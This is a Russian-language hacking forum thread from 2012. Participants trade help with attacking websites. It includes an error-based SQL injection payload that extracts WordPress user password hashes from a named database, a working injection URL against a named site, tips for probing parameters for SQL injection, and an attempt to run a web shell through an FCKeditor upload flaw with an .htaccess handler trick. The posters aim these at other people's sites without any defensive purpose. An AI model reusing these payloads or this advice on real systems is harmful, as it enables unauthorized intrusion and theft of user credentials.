15.12.2012, 19:05
|
|
Новичок
Регистрация: 29.09.2010
Сообщений: 21
С нами:
8220566
Репутация:
0
|
|
Заливка шелла через phpinfo + LFI
|
|
|
15.12.2012, 19:18
|
|
Познающий
Регистрация: 25.10.2012
Сообщений: 61
С нами:
7130486
Репутация:
0
|
|
Сообщение от beBoss
Заливка шелла через phpinfo + LFI
ну если на сайте есть LFI то да
|
|
|
|
15.12.2012, 22:10
|
|
Постоянный
Регистрация: 05.09.2012
Сообщений: 388
С нами:
7202486
Репутация:
124
|
|
Как можно с высокой долей вероятности определить наличие SQLi? В данный момент подставляю'%20group%20by%201%20-- во все параметры, а потом '%20group%20by%201000%20--, поидее если парамет текстовый и есть скуля будет разница в размере(в данный момент скрипт считает, что есть скуля при разнице в 500 байт, это нормальная чувствительность?) страницы. Жизнеспособный подход? Или может есть вариант лучше? Заранее спасибо.
|
|
|
|
15.12.2012, 22:17
|
|
Участник форума
Регистрация: 18.01.2012
Сообщений: 162
С нами:
7535126
Репутация:
1
|
|
Ребят помогите разобрать запрос :
нужно чтоб выводил (user_login,0x7e,user_pass) where+ID=1
никак не разберу.
Ну или хотяб подскажите прогу или сервисы чтоб значения символов самими символави заменял(%20=+ %28=( %29=) и т.д.)
1%20and%28select%201%20from%28select%20count%28*%2 9%2Cconcat%28%28select%20%28select%20%28select%20c oncat%280x27%2C0x7e%2Cwp_users.user_pass%2C0x27%2C 0x7e%29%20from%20%60kazachstan%60.wp_users%20Order %20by%20user_login%20limit%200%2C1%29%20%29%20from %20%60information_schema%60.tables%20limit%200%2C1 %29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60inf ormation_schema%60.tables%20group%20by%20x%29a%29% 20and%201%3D1
|
|
|
|
16.12.2012, 00:24
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от FunOfGun
Как можно с высокой долей вероятности определить наличие SQLi? В данный момент подставляю
'%20group%20by%201%20--
во все параметры, а потом
'%20group%20by%201000%20--
, поидее если парамет текстовый и есть скуля будет разница в размере(в данный момент скрипт считает, что есть скуля при разнице в 500 байт, это нормальная чувствительность?) страницы. Жизнеспособный подход? Или может есть вариант лучше? Заранее спасибо.
А если %20 фильтруется ? А если -- ?? А если group by ?
Абсолютно неверный подход имхо.
Сообщение от None
Ну или хотяб подскажите прогу или сервисы чтоб значения символов самими символави заменял(%20=+ %28=( %29=) и т.д.)
notepad.exe - Win+R - Заменить (%20) на (+)
Аналогично всё остальное
|
|
|
|
16.12.2012, 00:36
|
|
Постоянный
Регистрация: 05.09.2012
Сообщений: 388
С нами:
7202486
Репутация:
124
|
|
Сообщение от BigBear
А если
%20
фильтруется ? А если
--
?? А если
group by
?
Абсолютно неверный подход имхо.
Угу, а какой тогда перспективнее?
|
|
|
|
16.12.2012, 08:16
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Vip77
Как раскрутить http://www.its-my-life.ru/question.html?r=1
Именно в этом скрипте не нашел уязвимость, зато нашел тут:
Сообщение от None
http://www.its-my-life.ru/article/40/1202%27+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1 +UNION+SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT %28MID%28%28select+concat_ws%280x3a,version()%29%2 9,1,63%29+,+%20FLOOR%28RAND%280%29*2%29%29%29+--++--+%27.html
|
|
|
|
16.12.2012, 15:39
|
|
Участник форума
Регистрация: 18.01.2012
Сообщений: 162
С нами:
7535126
Репутация:
1
|
|
Как вывести несколько строчек из бд при выводе через ошибки?
Или допустим сначал 1 потом 2
Пишу limit 0,1 выводит 1 стоку ,а пишу limit 0,2 вываливает ошибку
|
|
|
|
16.12.2012, 15:40
|
|
Постоянный
Регистрация: 05.09.2012
Сообщений: 388
С нами:
7202486
Репутация:
124
|
|
Сообщение от blesse
Как вывести несколько строчек из бд при выводе через ошибки?
Или допустим сначал 1 потом 2
Пишу limit 0,1 выводит 1 стоку ,а пишу limit 0,2 вываливает ошибку
попробуйте limit 1,1. Должно вывести вторую, а limit 2,1 -- третью.
|
|
|
|
17.12.2012, 01:58
|
|
Новичок
Регистрация: 15.12.2012
Сообщений: 1
С нами:
7057046
Репутация:
0
|
|
Нужна Ваша помощь.
Нашел уязвимость на неком сайте в fckeditor. Можно заливать файлы все кроме php. Примечательно, что можно залить файл .htaccess даже. Я пробовал залить шелл с произвольным расширением в связке к примеру :
Код:
ForceType application/x-httpd-php SetHandler application/x-httpd-php
Но, вот какая незадача, он вместо запуска скачивается.
Прошу Вашей помощи.
Ccылка на уязвимость
Ссылка на файлы загруженные через едитор
Вобщем думаю знатокам будет интересно. Жду Ваших советов
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
